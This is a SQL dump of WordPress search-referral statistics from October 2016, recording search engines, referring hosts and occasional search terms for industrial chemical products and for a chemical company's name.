INSERT INTO `wp_statistics_search` VALUES (967, '2016-10-11', 'google', 'www.google.com', '', 2842); 
INSERT INTO `wp_statistics_search` VALUES (968, '2016-10-11', 'google', 'www.google.com', '', 2843); 
INSERT INTO `wp_statistics_search` VALUES (969, '2016-10-11', 'google', 'www.google.com', '', 2844); 
INSERT INTO `wp_statistics_search` VALUES (970, '2016-10-11', 'google', 'www.google.com.mx', '', 2845); 
INSERT INTO `wp_statistics_search` VALUES (971, '2016-10-11', 'google', 'www.google.com', '', 2846); 
INSERT INTO `wp_statistics_search` VALUES (972, '2016-10-11', 'bing', 'www.bing.com', 'miller-stephsen ms-755', 2847); 
INSERT INTO `wp_statistics_search` VALUES (973, '2016-10-11', 'bing', 'www.bing.com', 'miller stephnenson', 2848); 
INSERT INTO `wp_statistics_search` VALUES (974, '2016-10-11', 'google', 'www.google.com', '', 2849); 
INSERT INTO `wp_statistics_search` VALUES (975, '2016-10-11', 'google', 'www.google.com', '', 2850); 
INSERT INTO `wp_statistics_search` VALUES (976, '2016-10-11', 'google', 'www.google.ca', '', 2851); 
INSERT INTO `wp_statistics_search` VALUES (977, '2016-10-11', 'google', 'www.google.com', '', 2852); 
INSERT INTO `wp_statistics_search` VALUES (978, '2016-10-11', 'google', 'www.google.com', '', 2853); 
INSERT INTO `wp_statistics_search` VALUES (979, '2016-10-11', 'google', 'www.google.com', '', 2854); 
INSERT INTO `wp_statistics_search` VALUES (980, '2016-10-11', 'google', 'www.google.com', '', 2861); 
INSERT INTO `wp_statistics_search` VALUES (981, '2016-10-11', 'google', 'www.google.com', '', 2865); 
INSERT INTO `wp_statistics_search` VALUES (982, '2016-10-11', 'google', 'www.google.com', '', 2867); 
INSERT INTO `wp_statistics_search` VALUES (983, '2016-10-11', 'google', 'www.google.com', '', 2868); 
INSERT INTO `wp_statistics_search` VALUES (984, '2016-10-11', 'google', 'www.google.com', '', 2871); 
INSERT INTO `wp_statistics_search` VALUES (985, '2016-10-11', 'google', 'www.google.ca', '', 2872); 
INSERT INTO `wp_statistics_search` VALUES (986, '2016-10-11', 'google', 'www.google.com', '', 2873); 
INSERT INTO `wp_statistics_search` VALUES (987, '2016-10-11', 'google', 'www.google.com.sa', '', 2874); 
INSERT INTO `wp_statistics_search` VALUES (988, '2016-10-11', 'google', 'www.google.com', '', 2875); 
INSERT INTO `wp_statistics_search` VALUES (989, '2016-10-11', 'bing', 'www.bing.com', '1001f', 2880); 
INSERT INTO `wp_statistics_search` VALUES (990, '2016-10-11', 'google', 'www.google.com', '', 2882); 
INSERT INTO `wp_statistics_search` VALUES (991, '2016-10-11', 'google', 'www.google.com', '', 2887); 
INSERT INTO `wp_statistics_search` VALUES (992, '2016-10-11', 'google', 'www.google.co.nz', '', 2889); 
INSERT INTO `wp_statistics_search` VALUES (993, '2016-10-11', 'google', 'www.google.com', '', 2890); 
INSERT INTO `wp_statistics_search` VALUES (994, '2016-10-11', 'google', 'www.google.com', '', 2891); 
INSERT INTO `wp_statistics_search` VALUES (995, '2016-10-11', 'google', 'www.google.com', '', 2892); 
INSERT INTO `wp_statistics_search` VALUES (996, '2016-10-11', 'yahoo', 'search.yahoo.com', '', 2893); 
INSERT INTO `wp_statistics_search` VALUES (997, '2016-10-11', 'google', 'www.google.com', '', 2894); 
INSERT INTO `wp_statistics_search` VALUES (998, '2016-10-11', 'google', 'www.google.com', '', 2895); 
INSERT INTO `wp_statistics_search` VALUES (999, '2016-10-11', 'bing', 'www.bing.com', 'krytox ts4', 2898); 
INSERT INTO `wp_statistics_search` VALUES (1000, '2016-10-11', 'google', 'www.google.com', '', 2904); 
INSERT INTO `wp_statistics_search` VALUES (1001, '2016-10-11', 'google', 'www.google.com', '', 2906); 
INSERT INTO `wp_statistics_search` VALUES (1002, '2016-10-11', 'google', 'www.google.co.nz', '', 2911); 
INSERT INTO `wp_statistics_search` VALUES (1003, '2016-10-11', 'google', 'www.google.com', '', 2913); 
INSERT INTO `wp_statistics_search` VALUES (1004, '2016-10-11', 'google', 'www.google.com', '', 2917); 
INSERT INTO `wp_statistics_search` VALUES (1005, '2016-10-11', 'google', 'www.google.com', '', 2918); 
INSERT INTO `wp_statistics_search` VALUES (1006, '2016-10-11', 'google', 'www.google.com', '', 2919); 
INSERT INTO `wp_statistics_search` VALUES (1007, '2016-10-11', 'google', 'www.google.it', '', 2921); 
INSERT INTO `wp_statistics_search` VALUES (1008, '2016-10-11', 'google', 'www.google.com', '', 2922); 
INSERT INTO `wp_statistics_search` VALUES (1009, '2016-10-11', 'google', 'www.google.com', '', 2923); 
INSERT INTO `wp_statistics_search` VALUES (1010, '2016-10-11', 'google', 'www.google.com', '', 2927); 
INSERT INTO `wp_statistics_search` VALUES (1011, '2016-10-11', 'google', 'www.google.com', '', 2929); 
INSERT INTO `wp_statistics_search` VALUES (1012, '2016-10-11', 'google', 'www.google.com', '', 2931); 
INSERT INTO `wp_statistics_search` VALUES (1013, '2016-10-11', 'google', 'www.google.ca', '', 2932); 
INSERT INTO `wp_statistics_search` VALUES (1014, '2016-10-11', 'google', 'www.google.com', '', 2934); 
INSERT INTO `wp_statistics_search` VALUES (1015, '2016-10-11', 'google', 'www.google.com', '', 2937); 
INSERT INTO `wp_statistics_search` VALUES (1016, '2016-10-11', 'google', 'www.google.com', '', 2940); 
INSERT INTO `wp_statistics_search` VALUES (1017, '2016-10-11', 'google', 'www.google.com', '', 2941); 
INSERT INTO `wp_statistics_search` VALUES (1018, '2016-10-12', 'google', 'www.google.ca', '', 2961); 
INSERT INTO `wp_statistics_search` VALUES (1019, '2016-10-12', 'google', 'www.google.com', '', 2962); 
INSERT INTO `wp_statistics_search` VALUES (1020, '2016-10-12', 'google', 'www.google.com.mx', '', 2964); 
INSERT INTO `wp_statistics_search` VALUES (1021, '2016-10-12', 'google', 'www.google.com', '', 2967); 
INSERT INTO `wp_statistics_search` VALUES (1022, '2016-10-12', 'google', 'www.google.com', '', 2969); 
INSERT INTO `wp_statistics_search` VALUES (1023, '2016-10-12', 'google', 'www.google.com', '', 2970); 
INSERT INTO `wp_statistics_search` VALUES (1024, '2016-10-12', 'google', 'www.google.com', '', 2978); 
INSERT INTO `wp_statistics_search` VALUES (1025, '2016-10-12', 'google', 'www.google.com', '', 2987); 
INSERT INTO `wp_statistics_search` VALUES (1026, '2016-10-12', 'bing', 'www.bing.com', 'epon 862 tds', 2993); 
INSERT INTO `wp_statistics_search` VALUES (1027, '2016-10-12', 'google', 'www.google.co.il', '', 2998); 
INSERT INTO `wp_statistics_search` VALUES (1028, '2016-10-12', 'google', 'com.google.android.googlequicksearchbox', '', 2999); 
INSERT INTO `wp_statistics_search` VALUES (1029, '2016-10-12', 'google', 'www.google.com.hk', '', 3000); 
INSERT INTO `wp_statistics_search` VALUES (1030, '2016-10-12', 'google', 'www.google.com', '', 3002); 
INSERT INTO `wp_statistics_search` VALUES (1031, '2016-10-12', 'google', 'www.google.com', '', 3012); 
INSERT INTO `wp_statistics_search` VALUES (1032, '2016-10-12', 'google', 'www.google.co.jp', '', 3016); 
INSERT INTO `wp_statistics_search` VALUES (1033, '2016-10-12', 'google', 'www.google.co.in', '', 3017); 
INSERT INTO `wp_statistics_search` VALUES (1034, '2016-10-12', 'google', 'www.google.com', '', 3020); 
INSERT INTO `wp_statistics_search` VALUES (1035, '2016-10-12', 'google', 'www.google.com', '', 3022); 
INSERT INTO `wp_statistics_search` VALUES (1036, '2016-10-12', 'google', 'www.google.co.in', '', 3026); 
INSERT INTO `wp_statistics_search` VALUES (1037, '2016-10-12', 'google', 'www.google.co.in', '', 3032); 
INSERT INTO `wp_statistics_search` VALUES (1038, '2016-10-12', 'google', 'www.google.com', '', 3037); 
INSERT INTO `wp_statistics_search` VALUES (1039, '2016-10-12', 'google', 'www.google.co.in', '', 3040); 
INSERT INTO `wp_statistics_search` VALUES (1040, '2016-10-12', 'google', 'www.google.co.in', '', 3048); 
INSERT INTO `wp_statistics_search` VALUES (1041, '2016-10-12', 'google', 'www.google.co.za', '', 3049); 
INSERT INTO `wp_statistics_search` VALUES (1042, '2016-10-12', 'yahoo', 'r.search.yahoo.com', '', 3052); 
INSERT INTO `wp_statistics_search` VALUES (1043, '2016-10-12', 'baidu', 'www.baidu.com', '', 3054); 
INSERT INTO `wp_statistics_search` VALUES (1044, '2016-10-12', 'google', 'www.google.co.in', '', 3085); 
INSERT INTO `wp_statistics_search` VALUES (1045, '2016-10-12', 'google', 'www.google.ru', '', 3088); 
INSERT INTO `wp_statistics_search` VALUES (1046, '2016-10-12', 'google', 'www.google.co.uk', '', 3119); 
INSERT INTO `wp_statistics_search` VALUES (1047, '2016-10-12', 'google', 'www.google.co.in', '', 3121); 
INSERT INTO `wp_statistics_search` VALUES (1048, '2016-10-12', 'bing', 'www.bing.com', 'Gases  Chemicals ', 3123); 
INSERT INTO `wp_statistics_search` VALUES (1049, '2016-10-12', 'google', 'www.google.com.sg', '', 3128); 
INSERT INTO `wp_statistics_search` VALUES (1050, '2016-10-12', 'google', 'www.google.co.uk', '', 3129); 
INSERT INTO `wp_statistics_search` VALUES (1051, '2016-10-12', 'google', 'www.google.ro', '', 3130); 
INSERT INTO `wp_statistics_search` VALUES (1052, '2016-10-12', 'google', 'www.google.de', '', 3138); 
INSERT INTO `wp_statistics_search` VALUES (1053, '2016-10-12', 'google', 'www.google.bg', '', 3157); 
INSERT INTO `wp_statistics_search` VALUES (1054, '2016-10-12', 'google', 'www.google.co.uk', '', 3159); 
INSERT INTO `wp_statistics_search` VALUES (1055, '2016-10-12', 'google', 'www.google.es', '', 3163); 
INSERT INTO `wp_statistics_search` VALUES (1056, '2016-10-12', 'google', 'www.google.co.in', '', 3164); 
INSERT INTO `wp_statistics_search` VALUES (1057, '2016-10-12', 'bing', 'www.bing.com', 'miller stephenson chemical', 3168); 
INSERT INTO `wp_statistics_search` VALUES (1058, '2016-10-12', 'google', 'www.google.com.tr', '', 3169); 
INSERT INTO `wp_statistics_search` VALUES (1059, '2016-10-12', 'google', 'www.google.nl', '', 3181); 
INSERT INTO `wp_statistics_search` VALUES (1060, '2016-10-12', 'google', 'www.google.ru', '', 3183); 
INSERT INTO `wp_statistics_search` VALUES (1061, '2016-10-12', 'google', 'www.google.ca', '', 3185); 
INSERT INTO `wp_statistics_search` VALUES (1062, '2016-10-12', 'google', 'www.google.com', '', 3186); 
INSERT INTO `wp_statistics_search` VALUES (1063, '2016-10-12', 'google', 'www.google.com', '', 3191); 
INSERT INTO `wp_statistics_search` VALUES (1064, '2016-10-12', 'google', 'www.google.com.sg', '', 3192); 
INSERT INTO `wp_statistics_search` VALUES (1065, '2016-10-12', 'google', 'www.google.com', '', 3194); 
INSERT INTO `wp_statistics_search` VALUES (1066, '2016-10-12', 'google', 'www.google.com', '', 3195); 
INSERT INTO `wp_statistics_search` VALUES (1067, '2016-10-12', 'google', 'www.google.com', '', 3199); 
INSERT INTO `wp_statistics_search` VALUES (1068, '2016-10-12', 'google', 'www.google.com', '', 3200); 
INSERT INTO `wp_statistics_search` VALUES (1069, '2016-10-12', 'google', 'www.google.ch', '', 3201); 
INSERT INTO `wp_statistics_search` VALUES (1070, '2016-10-12', 'google', 'www.google.ch', '', 3202); 
INSERT INTO `wp_statistics_search` VALUES (1071, '2016-10-12', 'google', 'www.google.ch', '', 3204); 
INSERT INTO `wp_statistics_search` VALUES (1072, '2016-10-12', 'google', 'www.google.com', '', 3211); 
INSERT INTO `wp_statistics_search` VALUES (1073, '2016-10-12', 'google', 'www.google.com', '', 3213); 
INSERT INTO `wp_statistics_search` VALUES (1074, '2016-10-12', 'google', 'www.google.com', '', 3219); 
INSERT INTO `wp_statistics_search` VALUES (1075, '2016-10-12', 'google', 'www.google.ca', '', 3220); 
INSERT INTO `wp_statistics_search` VALUES (1076, '2016-10-12', 'google', 'www.google.com', '', 3223); 
INSERT INTO `wp_statistics_search` VALUES (1077, '2016-10-12', 'google', 'www.google.com', '', 3224); 
INSERT INTO `wp_statistics_search` VALUES (1078, '2016-10-12', 'google', 'www.google.com', '', 3225); 
INSERT INTO `wp_statistics_search` VALUES (1079, '2016-10-12', 'google', 'www.google.com', '', 3234); 
INSERT INTO `wp_statistics_search` VALUES (1080, '2016-10-12', 'google', 'www.google.com', '', 3236); 
INSERT INTO `wp_statistics_search` VALUES (1081, '2016-10-12', 'google', 'www.google.com', '', 3238); 
INSERT INTO `wp_statistics_search` VALUES (1082, '2016-10-12', 'google', 'www.google.com', '', 3239); 
INSERT INTO `wp_statistics_search` VALUES (1083, '2016-10-12', 'google', 'www.google.com', '', 3242); 
INSERT INTO `wp_statistics_search` VALUES (1084, '2016-10-12', 'google', 'www.google.com', '', 3244); 
INSERT INTO `wp_statistics_search` VALUES (1085, '2016-10-12', 'yahoo', 'r.search.yahoo.com', '', 3245); 
INSERT INTO `wp_statistics_search` VALUES (1086, '2016-10-12', 'google', 'www.google.ca', '', 3246); 
INSERT INTO `wp_statistics_search` VALUES (1087, '2016-10-12', 'google', 'www.google.com', '', 3247); 
INSERT INTO `wp_statistics_search` VALUES (1088, '2016-10-12', 'bing', 'www.bing.com', 'vazo initiators', 3249); 
INSERT INTO `wp_statistics_search` VALUES (1089, '2016-10-12', 'google', 'www.google.com', '', 3250); 
INSERT INTO `wp_statistics_search` VALUES (1090, '2016-10-12', 'google', 'www.google.co.kr', '', 3251); 
INSERT INTO `wp_statistics_search` VALUES (1091, '2016-10-12', 'google', 'www.google.fr', '', 3254); 
INSERT INTO `wp_statistics_search` VALUES (1092, '2016-10-12', 'bing', 'www.bing.com', 'miller stevenson', 3255); 
INSERT INTO `wp_statistics_search` VALUES (1093, '2016-10-12', 'bing', 'www.bing.com', '', 3257); 
INSERT INTO `wp_statistics_search` VALUES (1094, '2016-10-12', 'google', 'www.google.com', '', 3259); 
INSERT INTO `wp_statistics_search` VALUES (1095, '2016-10-12', 'google', 'www.google.com', '', 3260); 
INSERT INTO `wp_statistics_search` VALUES (1096, '2016-10-12', 'google', 'www.google.se', '', 3261); 
INSERT INTO `wp_statistics_search` VALUES (1097, '2016-10-12', 'google', 'www.google.co.uk', '', 3262); 
INSERT INTO `wp_statistics_search` VALUES (1098, '2016-10-12', 'google', 'www.google.ca', '', 3264); 
INSERT INTO `wp_statistics_search` VALUES (1099, '2016-10-12', 'google', 'www.google.com', '', 3265); 
INSERT INTO `wp_statistics_search` VALUES (1100, '2016-10-12', 'google', 'www.google.com', '', 3266); 
INSERT INTO `wp_statistics_search` VALUES (1101, '2016-10-12', 'google', 'www.google.com', '', 3269); 
INSERT INTO `wp_statistics_search` VALUES (1102, '2016-10-12', 'google', 'www.google.com', '', 3270); 
INSERT INTO `wp_statistics_search` VALUES (1103, '2016-10-12', 'google', 'www.google.com', '', 3274); 
INSERT INTO `wp_statistics_search` VALUES (1104, '2016-10-12', 'google', 'www.google.com', '', 3276); 
INSERT INTO `wp_statistics_search` VALUES (1105, '2016-10-12', 'google', 'www.google.co.in', '', 3279); 
INSERT INTO `wp_statistics_search` VALUES (1106, '2016-10-12', 'yahoo', 'us.search.yahoo.com', '', 3280); 
INSERT INTO `wp_statistics_search` VALUES (1107, '2016-10-12', 'google', 'www.google.com', '', 3288); 
INSERT INTO `wp_statistics_search` VALUES (1108, '2016-10-12', 'google', 'www.google.com', '', 3291); 
INSERT INTO `wp_statistics_search` VALUES (1109, '2016-10-12', 'google', 'www.google.com', '', 3292); 
INSERT INTO `wp_statistics_search` VALUES (1110, '2016-10-12', 'google', 'www.google.com', '', 3294); 
INSERT INTO `wp_statistics_search` VALUES (1111, '2016-10-12', 'google', 'www.google.ca', '', 3297); 
INSERT INTO `wp_statistics_search` VALUES (1112, '2016-10-12', 'google', 'www.google.com', '', 3298); 
INSERT INTO `wp_statistics_search` VALUES (1113, '2016-10-12', 'google', 'www.google.com', '', 3299); 
INSERT INTO `wp_statistics_search` VALUES (1114, '2016-10-12', 'google', 'www.google.com', '', 3300); 
INSERT INTO `wp_statistics_search` VALUES (1115, '2016-10-12', 'google', 'www.google.com', '', 3306); 
INSERT INTO `wp_statistics_search` VALUES (1116, '2016-10-12', 'bing', 'www.bing.com', '283ad grease', 3310); 
INSERT INTO `wp_statistics_search` VALUES (1117, '2016-10-12', 'google', 'www.google.com.mx', '', 3311); 
INSERT INTO `wp_statistics_search` VALUES (1118, '2016-10-12', 'bing', 'www.bing.com', 'MILLER STEPHESEN', 3312); 
INSERT INTO `wp_statistics_search` VALUES (1119, '2016-10-12', 'google', 'www.google.com', '', 3315); 
INSERT INTO `wp_statistics_search` VALUES (1120, '2016-10-12', 'google', 'www.google.com', '', 3317); 
INSERT INTO `wp_statistics_search` VALUES (1121, '2016-10-12', 'google', 'www.google.ca', '', 3319); 
INSERT INTO `wp_statistics_search` VALUES (1122, '2016-10-12', 'google', 'www.google.com', '', 3321); 
INSERT INTO `wp_statistics_search` VALUES (1123, '2016-10-12', 'google', 'www.google.com', '', 3323); 
INSERT INTO `wp_statistics_search` VALUES (1124, '2016-10-12', 'google', 'www.google.com', '', 3325); 
INSERT INTO `wp_statistics_search` VALUES (1125, '2016-10-12', 'google', 'www.google.com', '', 3326); 
INSERT INTO `wp_statistics_search` VALUES (1126, '2016-10-12', 'google', 'www.google.com', '', 3329); 
INSERT INTO `wp_statistics_search` VALUES (1127, '2016-10-12', 'google', 'www.google.com', '', 3331); 
INSERT INTO `wp_statistics_search` VALUES (1128, '2016-10-12', 'google', 'www.google.com', '', 3335); 
INSERT INTO `wp_statistics_search` VALUES (1129, '2016-10-12', 'google', 'www.google.ca', '', 3338); 
INSERT INTO `wp_statistics_search` VALUES (1130, '2016-10-12', 'google', 'www.google.com', '', 3342); 
INSERT INTO `wp_statistics_search` VALUES (1131, '2016-10-12', 'google', 'www.google.com', '', 3343); 
INSERT INTO `wp_statistics_search` VALUES (1132, '2016-10-12', 'google', 'www.google.com', '', 3347); 
INSERT INTO `wp_statistics_search` VALUES (1133, '2016-10-12', 'google', 'www.google.com', '', 3349); 
INSERT INTO `wp_statistics_search` VALUES (1134, '2016-10-12', 'google', 'www.google.cl', '', 3351); 
INSERT INTO `wp_statistics_search` VALUES (1135, '2016-10-12', 'google', 'www.google.com', '', 3354); 
INSERT INTO `wp_statistics_search` VALUES (1136, '2016-10-12', 'google', 'www.google.com', '', 3355); 
INSERT INTO `wp_statistics_search` VALUES (1137, '2016-10-12', 'google', 'www.google.com', '', 3357); 
INSERT INTO `wp_statistics_search` VALUES (1138, '2016-10-12', 'google', 'www.google.com', '', 3358); 
INSERT INTO `wp_statistics_search` VALUES (1139, '2016-10-12', 'google', 'www.google.com', '', 3359); 
INSERT INTO `wp_statistics_search` VALUES (1140, '2016-10-12', 'google', 'www.google.com', '', 3360); 
INSERT INTO `wp_statistics_search` VALUES (1141, '2016-10-12', 'google', 'www.google.com', '', 3363); 
INSERT INTO `wp_statistics_search` VALUES (1142, '2016-10-12', 'google', 'www.google.com', '', 3364); 
INSERT INTO `wp_statistics_search` VALUES (1143, '2016-10-12', 'google', 'www.google.com', '', 3365); 
INSERT INTO `wp_statistics_search` VALUES (1144, '2016-10-12', 'google', 'www.google.com', '', 3368); 
INSERT INTO `wp_statistics_search` VALUES (1145, '2016-10-12', 'google', 'www.google.ca', '', 3370); 
INSERT INTO `wp_statistics_search` VALUES (1146, '2016-10-12', 'google', 'com.google.android.googlequicksearchbox', '', 3371); 
INSERT INTO `wp_statistics_search` VALUES (1147, '2016-10-12', 'google', 'www.google.com', '', 3372); 
INSERT INTO `wp_statistics_search` VALUES (1148, '2016-10-12', 'google', 'www.google.com', '', 3374); 
INSERT INTO `wp_statistics_search` VALUES (1149, '2016-10-12', 'google', 'www.google.com', '', 3375); 
INSERT INTO `wp_statistics_search` VALUES (1150, '2016-10-12', 'google', 'www.google.com', '', 3379); 
INSERT INTO `wp_statistics_search` VALUES (1151, '2016-10-12', 'google', 'www.google.com', '', 3384); 
INSERT INTO `wp_statistics_search` VALUES (1152, '2016-10-12', 'google', 'www.google.com', '', 3386); 
INSERT INTO `wp_statistics_search` VALUES (1153, '2016-10-12', 'google', 'www.google.com', '', 3389); 
INSERT INTO `wp_statistics_search` VALUES (1154, '2016-10-12', 'bing', 'www.bing.com', '', 3392); 
INSERT INTO `wp_statistics_search` VALUES (1155, '2016-10-12', 'google', 'www.google.ca', '', 3396); 
INSERT INTO `wp_statistics_search` VALUES (1156, '2016-10-12', 'yahoo', 'r.search.yahoo.com', '', 3399); 
INSERT INTO `wp_statistics_search` VALUES (1157, '2016-10-12', 'google', 'www.google.com', '', 3400); 
INSERT INTO `wp_statistics_search` VALUES (1158, '2016-10-12', 'google', 'www.google.com', '', 3401); 
INSERT INTO `wp_statistics_search` VALUES (1159, '2016-10-12', 'google', 'www.google.com', '', 3409); 
INSERT INTO `wp_statistics_search` VALUES (1160, '2016-10-12', 'google', 'www.google.com', '', 3410); 
INSERT INTO `wp_statistics_search` VALUES (1161, '2016-10-12', 'bing', 'www.bing.com', 'EPIKURE 3164 Polyamide Curing Agent', 3413); 
INSERT INTO `wp_statistics_search` VALUES (1162, '2016-10-12', 'yandex', 'yandex.ru', '', 3416); 
INSERT INTO `wp_statistics_search` VALUES (1163, '2016-10-12', 'yahoo', 'search.yahoo.com', '', 3417); 
INSERT INTO `wp_statistics_search` VALUES (1164, '2016-10-12', 'yahoo', 'r.search.yahoo.com', '', 3419); 
INSERT INTO `wp_statistics_search` VALUES (1165, '2016-10-12', 'google', 'www.google.co.id', '', 3422); 
INSERT INTO `wp_statistics_search` VALUES (1166, '2016-10-12', 'google', 'www.google.ca', '', 3423); 
INSERT INTO `wp_statistics_search` VALUES (1167, '2016-10-12', 'bing', 'www.bing.com', 'epikure 3140 vs versamid 140', 3426); 
INSERT INTO `wp_statistics_search` VALUES (1168, '2016-10-12', 'google', 'www.google.ca', '', 3438); 
INSERT INTO `wp_statistics_search` VALUES (1169, '2016-10-12', 'google', 'www.google.com', '', 3442); 
INSERT INTO `wp_statistics_search` VALUES (1170, '2016-10-12', 'google', 'www.google.co.uk', '', 3443); 
INSERT INTO `wp_statistics_search` VALUES (1171, '2016-10-12', 'google', 'www.google.com', '', 3446); 
INSERT INTO `wp_statistics_search` VALUES (1172, '2016-10-12', 'google', 'www.google.com', '', 3447); 
INSERT INTO `wp_statistics_search` VALUES (1173, '2016-10-12', 'google', 'www.google.com', '', 3448); 
INSERT INTO `wp_statistics_search` VALUES (1174, '2016-10-12', 'google', 'www.google.com', '', 3449); 
INSERT INTO `wp_statistics_search` VALUES (1175, '2016-10-12', 'google', 'www.google.com', '', 3450); 
INSERT INTO `wp_statistics_search` VALUES (1176, '2016-10-12', 'google', 'www.google.com', '', 3451); 
INSERT INTO `wp_statistics_search` VALUES (1177, '2016-10-12', 'google', 'www.google.com', '', 3455); 
INSERT INTO `wp_statistics_search` VALUES (1178, '2016-10-13', 'google', 'www.google.com', '', 3458); 
INSERT INTO `wp_statistics_search` VALUES (1179, '2016-10-13', 'google', 'www.google.com', '', 3463); 
INSERT INTO `wp_statistics_search` VALUES (1180, '2016-10-13', 'google', 'www.google.com', '', 3471); 
INSERT INTO `wp_statistics_search` VALUES (1181, '2016-10-13', 'google', 'www.google.ca', '', 3473); 
INSERT INTO `wp_statistics_search` VALUES (1182, '2016-10-13', 'google', 'www.google.com', '', 3474); 
INSERT INTO `wp_statistics_search` VALUES (1183, '2016-10-13', 'google', 'www.google.com', '', 3492); 
INSERT INTO `wp_statistics_search` VALUES (1184, '2016-10-13', 'google', 'www.google.com', '', 3507); 
INSERT INTO `wp_statistics_search` VALUES (1185, '2016-10-13', 'google', 'www.google.co.th', '', 3519); 
INSERT INTO `wp_statistics_search` VALUES (1186, '2016-10-13', 'baidu', 'www.baidu.com', '', 3523); 
INSERT INTO `wp_statistics_search` VALUES (1187, '2016-10-13', 'google', 'www.google.co.jp', '', 3530); 
INSERT INTO `wp_statistics_search` VALUES (1188, '2016-10-13', 'google', 'www.google.com', '', 3541); 
INSERT INTO `wp_statistics_search` VALUES (1189, '2016-10-13', 'google', 'www.google.com', '', 3544); 
INSERT INTO `wp_statistics_search` VALUES (1190, '2016-10-13', 'google', 'www.google.co.in', '', 3546); 
INSERT INTO `wp_statistics_search` VALUES (1191, '2016-10-13', 'google', 'www.google.com', '', 3547); 
INSERT INTO `wp_statistics_search` VALUES (1192, '2016-10-13', 'google', 'www.google.com', '', 3552); 
INSERT INTO `wp_statistics_search` VALUES (1193, '2016-10-13', 'google', 'www.google.co.in', '', 3558); 
INSERT INTO `wp_statistics_search` VALUES (1194, '2016-10-13', 'google', 'www.google.com', '', 3562); 
INSERT INTO `wp_statistics_search` VALUES (1195, '2016-10-13', 'google', 'www.google.co.in', '', 3563); 
INSERT INTO `wp_statistics_search` VALUES (1196, '2016-10-13', 'google', 'www.google.com.my', '', 3564); 
INSERT INTO `wp_statistics_search` VALUES (1197, '2016-10-13', 'google', 'www.google.com.sg', '', 3565); 
INSERT INTO `wp_statistics_search` VALUES (1198, '2016-10-13', 'google', 'www.google.it', '', 3582); 
INSERT INTO `wp_statistics_search` VALUES (1199, '2016-10-13', 'google', 'www.google.be', '', 3583); 
INSERT INTO `wp_statistics_search` VALUES (1200, '2016-10-13', 'google', 'www.google.ru', '', 3586); 
INSERT INTO `wp_statistics_search` VALUES (1201, '2016-10-13', 'google', 'www.google.gr', '', 3588); 
INSERT INTO `wp_statistics_search` VALUES (1202, '2016-10-13', 'google', 'www.google.co.il', '', 3591); 
INSERT INTO `wp_statistics_search` VALUES (1203, '2016-10-13', 'google', 'www.google.ch', '', 3596); 
INSERT INTO `wp_statistics_search` VALUES (1204, '2016-10-13', 'google', 'www.google.co.kr', '', 3597); 
INSERT INTO `wp_statistics_search` VALUES (1205, '2016-10-13', 'google', 'www.google.no', '', 3599); 
INSERT INTO `wp_statistics_search` VALUES (1206, '2016-10-13', 'google', 'www.google.co.uk', '', 3603); 
INSERT INTO `wp_statistics_search` VALUES (1207, '2016-10-13', 'google', 'www.google.pl', '', 3607); 
INSERT INTO `wp_statistics_search` VALUES (1208, '2016-10-13', 'google', 'www.google.de', '', 3608); 
INSERT INTO `wp_statistics_search` VALUES (1209, '2016-10-13', 'google', 'www.google.de', '', 3609); 
INSERT INTO `wp_statistics_search` VALUES (1210, '2016-10-13', 'bing', 'www.bing.com', '', 3610); 
INSERT INTO `wp_statistics_search` VALUES (1211, '2016-10-13', 'google', 'www.google.com', '', 3615); 
INSERT INTO `wp_statistics_search` VALUES (1212, '2016-10-13', 'bing', 'www.bing.com', '', 3616); 
INSERT INTO `wp_statistics_search` VALUES (1213, '2016-10-13', 'google', 'www.google.co.in', '', 3619); 
INSERT INTO `wp_statistics_search` VALUES (1214, '2016-10-13', 'google', 'www.google.co.in', '', 3621); 
INSERT INTO `wp_statistics_search` VALUES (1215, '2016-10-13', 'google', 'www.google.co.in', '', 3623); 
INSERT INTO `wp_statistics_search` VALUES (1216, '2016-10-13', 'google', 'www.google.pl', '', 3626); 
INSERT INTO `wp_statistics_search` VALUES (1217, '2016-10-13', 'google', 'www.google.com', '', 3628); 
INSERT INTO `wp_statistics_search` VALUES (1218, '2016-10-13', 'google', 'www.google.se', '', 3629); 
INSERT INTO `wp_statistics_search` VALUES (1219, '2016-10-13', 'google', 'www.google.co.uk', '', 3633); 
INSERT INTO `wp_statistics_search` VALUES (1220, '2016-10-13', 'google', 'www.google.com', '', 3634); 
INSERT INTO `wp_statistics_search` VALUES (1221, '2016-10-13', 'google', 'www.google.com', '', 3637); 
INSERT INTO `wp_statistics_search` VALUES (1222, '2016-10-13', 'google', 'www.google.de', '', 3638); 
INSERT INTO `wp_statistics_search` VALUES (1223, '2016-10-13', 'google', 'www.google.co.il', '', 3646); 
INSERT INTO `wp_statistics_search` VALUES (1224, '2016-10-13', 'google', 'www.google.com', '', 3647); 
INSERT INTO `wp_statistics_search` VALUES (1225, '2016-10-13', 'google', 'www.google.com', '', 3650); 
INSERT INTO `wp_statistics_search` VALUES (1226, '2016-10-13', 'google', 'www.google.com', '', 3654); 
INSERT INTO `wp_statistics_search` VALUES (1227, '2016-10-13', 'google', 'www.google.com.tr', '', 3657); 
INSERT INTO `wp_statistics_search` VALUES (1228, '2016-10-13', 'google', 'www.google.com', '', 3661); 
INSERT INTO `wp_statistics_search` VALUES (1229, '2016-10-13', 'google', 'www.google.com', '', 3668); 
INSERT INTO `wp_statistics_search` VALUES (1230, '2016-10-13', 'bing', 'www.bing.com', 'high temp release agents', 3670); 
INSERT INTO `wp_statistics_search` VALUES (1231, '2016-10-13', 'bing', 'www.bing.com', 'miller stephenson chemical company', 3678); 
INSERT INTO `wp_statistics_search` VALUES (1232, '2016-10-13', 'google', 'www.google.com', '', 3679); 
INSERT INTO `wp_statistics_search` VALUES (1233, '2016-10-13', 'google', 'www.google.com', '', 3680); 
INSERT INTO `wp_statistics_search` VALUES (1234, '2016-10-13', 'google', 'www.google.com', '', 3681); 
INSERT INTO `wp_statistics_search` VALUES (1235, '2016-10-13', 'google', 'www.google.com', '', 3687); 
INSERT INTO `wp_statistics_search` VALUES (1236, '2016-10-13', 'google', 'www.google.com', '', 3689); 
INSERT INTO `wp_statistics_search` VALUES (1237, '2016-10-13', 'google', 'www.google.co.kr', '', 3693); 
INSERT INTO `wp_statistics_search` VALUES (1238, '2016-10-13', 'google', 'www.google.com', '', 3696); 
INSERT INTO `wp_statistics_search` VALUES (1239, '2016-10-13', 'bing', 'www.bing.com', '', 3698); 
INSERT INTO `wp_statistics_search` VALUES (1240, '2016-10-13', 'bing', 'www.bing.com', 'krytox xht-acx', 3699); 
INSERT INTO `wp_statistics_search` VALUES (1241, '2016-10-13', 'google', 'www.google.com.br', '', 3702); 
